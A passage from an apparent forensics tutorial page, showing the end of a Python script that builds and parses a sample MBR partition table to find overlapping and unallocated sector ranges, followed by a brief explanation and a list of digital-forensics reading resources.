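    entries = [(0x80, 0x07, 2048, 204800), (0x00, 0x83, 206848, 409600)]
    for slot, (boot, ptype, start, length) in enumerate(entries):
        struct.pack_into("<B3xB3xII", sec, 446 + 16 * slot, boot, ptype, start, length)
    sec[510:512] = b"\x55\xaa"
    return bytes(sec)


if __name__ == "__main__":
    # on a real image: parse_mbr(open("evidence.dd", "rb").read(SECTOR))
    parts = parse_mbr(build_sample_mbr())
    print(f"{'Slot':>4} {'Start':>10} {'End':>10} {'Length':>10}  Type")
    for p in parts:
        flag = "*" if p["bootable"] else " "
        print(f"{p['slot']:>3}{flag} {p['start']:>10} {p['end']:>10} {p['length']:>10}  {p['type']}")
    print("overlaps:", find_overlaps(parts))
    print("unallocated:", unallocated(parts, total_sectors=1048576))
```

The unallocated ranges are where deleted or hidden volumes live, so they are the first thing to carve; a type byte of 0xEE means the MBR is only a protective shell and the real layout is in the GPT header at LBA 1.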

Resources

Name | Detail
Learning Network Forensics | Learning Network Forensics, by Packt
Steganography for the Computer Forensics | An Overview of Steganography for the Computer Forensics Examiner
image forensics | Learning Rich Features for Image Manipulation Detection
Docker Forensics | Docker Forensics for Containers
memory forensics | Learn Windows memory forensics
Smartphone Forensic | Smartphone Forensic Analysis In-Depth


Tags: Computer Forensics, DFIR, Memory Forensics, Metadata Forensics, Steganography

© 2021 Reconshell All Rights Reserved.